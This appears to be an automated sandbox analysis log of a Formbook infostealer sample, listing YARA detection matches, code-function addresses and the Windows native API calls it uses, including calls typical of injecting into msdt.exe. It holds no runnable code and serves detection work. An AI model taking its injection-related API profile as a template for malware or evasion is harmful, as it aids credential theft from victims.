          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: S9yf6BkjhTQUbHE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.S9yf6BkjhTQUbHE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.S9yf6BkjhTQUbHE.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_05525AB00_2_05525AB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 0_2_05525AA00_2_05525AA0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041BA221_2_0041BA22
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041C42D1_2_0041C42D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00408C8D1_2_00408C8D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00408C901_2_00408C90
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041CFB41_2_0041CFB4
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BF9001_2_010BF900
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01182D071_2_01182D07
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B0D201_2_010B0D20
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D41201_2_010D4120
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01181D551_2_01181D55
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E25811_2_010E2581
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011825DD1_2_011825DD
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CD5E01_2_010CD5E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C841F1_2_010C841F
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011710021_2_01171002
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117D4661_2_0117D466
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CB0901_2_010CB090
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E20A01_2_010E20A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011820A81_2_011820A8
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011828EC1_2_011828EC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01182B281_2_01182B28
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EEBB01_2_010EEBB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117DBD21_2_0117DBD2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01181FF11_2_01181FF1
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D6E301_2_010D6E30
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011822AE1_2_011822AE
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01182EF71_2_01182EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6D46618_2_04D6D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB841F18_2_04CB841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D725DD18_2_04D725DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBD5E018_2_04CBD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD258118_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D71D5518_2_04D71D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D72D0718_2_04D72D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA0D2018_2_04CA0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D72EF718_2_04D72EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6D61618_2_04D6D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC6E3018_2_04CC6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7DFCE18_2_04D7DFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D71FF118_2_04D71FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D728EC18_2_04D728EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB09018_2_04CBB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A018_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D720A818_2_04D720A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6100218_2_04D61002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7E82418_2_04D7E824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA83018_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAF90018_2_04CAF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC412018_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D722AE18_2_04D722AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5FA2B18_2_04D5FA2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6DBD218_2_04D6DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D603DA18_2_04D603DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDEBB018_2_04CDEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAB4018_2_04CCAB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D72B2818_2_04D72B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EBA2218_2_008EBA22
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008D8C8D18_2_008D8C8D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008D8C9018_2_008D8C90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EC41E18_2_008EC41E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008D2D8718_2_008D2D87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008D2D9018_2_008D2D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008ECFB418_2_008ECFB4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008D2FB018_2_008D2FB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: String function: 010BB150 appears 35 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04CAB150 appears 54 times
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004185F0 NtCreateFile,1_2_004185F0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004186A0 NtReadFile,1_2_004186A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00418720 NtClose,1_2_00418720
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004187D0 NtAllocateVirtualMemory,1_2_004187D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0041869A NtReadFile,1_2_0041869A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004187CA NtAllocateVirtualMemory,1_2_004187CA
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_010F9910
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9540 NtReadFile,LdrInitializeThunk,1_2_010F9540
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F99A0 NtCreateSection,LdrInitializeThunk,1_2_010F99A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F95D0 NtClose,LdrInitializeThunk,1_2_010F95D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9840 NtDelayExecution,LdrInitializeThunk,1_2_010F9840
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_010F9860
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_010F98F0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_010F9710
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_010F9780
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_010F97A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9FE0 NtCreateMutant,LdrInitializeThunk,1_2_010F9FE0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_010F9A00
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A20 NtResumeThread,LdrInitializeThunk,1_2_010F9A20
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A50 NtCreateFile,LdrInitializeThunk,1_2_010F9A50
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_010F9660
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_010F96E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9520 NtWaitForSingleObject,1_2_010F9520
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FAD30 NtSetContextThread,1_2_010FAD30
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9950 NtQueueApcThread,1_2_010F9950
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9560 NtWriteFile,1_2_010F9560
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F99D0 NtCreateProcessEx,1_2_010F99D0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F95F0 NtQueryInformationFile,1_2_010F95F0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9820 NtEnumerateKey,1_2_010F9820
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FB040 NtSuspendThread,1_2_010FB040
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F98A0 NtWriteVirtualMemory,1_2_010F98A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9B00 NtSetValueKey,1_2_010F9B00
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FA710 NtOpenProcessToken,1_2_010FA710
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9730 NtQueryVirtualMemory,1_2_010F9730
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9760 NtOpenProcess,1_2_010F9760
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9770 NtSetInformationFile,1_2_010F9770
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FA770 NtOpenThread,1_2_010FA770
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010FA3B0 NtGetContextThread,1_2_010FA3B0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9610 NtEnumerateValueKey,1_2_010F9610
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A10 NtQuerySection,1_2_010F9A10
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9650 NtQueryValueKey,1_2_010F9650
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9670 NtQueryInformationProcess,1_2_010F9670
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F9A80 NtOpenDirectoryObject,1_2_010F9A80
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F96D0 NtCreateKey,1_2_010F96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE95D0 NtClose,LdrInitializeThunk,18_2_04CE95D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9540 NtReadFile,LdrInitializeThunk,18_2_04CE9540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE96D0 NtCreateKey,LdrInitializeThunk,18_2_04CE96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE96E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_04CE96E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9650 NtQueryValueKey,LdrInitializeThunk,18_2_04CE9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04CE9660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9FE0 NtCreateMutant,LdrInitializeThunk,18_2_04CE9FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9780 NtMapViewOfSection,LdrInitializeThunk,18_2_04CE9780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9710 NtQueryInformationToken,LdrInitializeThunk,18_2_04CE9710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9840 NtDelayExecution,LdrInitializeThunk,18_2_04CE9840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9860 NtQuerySystemInformation,LdrInitializeThunk,18_2_04CE9860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE99A0 NtCreateSection,LdrInitializeThunk,18_2_04CE99A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04CE9910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9A50 NtCreateFile,LdrInitializeThunk,18_2_04CE9A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE95F0 NtQueryInformationFile,18_2_04CE95F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9560 NtWriteFile,18_2_04CE9560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE9520 NtWaitForSingleObject,18_2_04CE9520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CEAD30 NtSetContextThread,18_2_04CEAD30
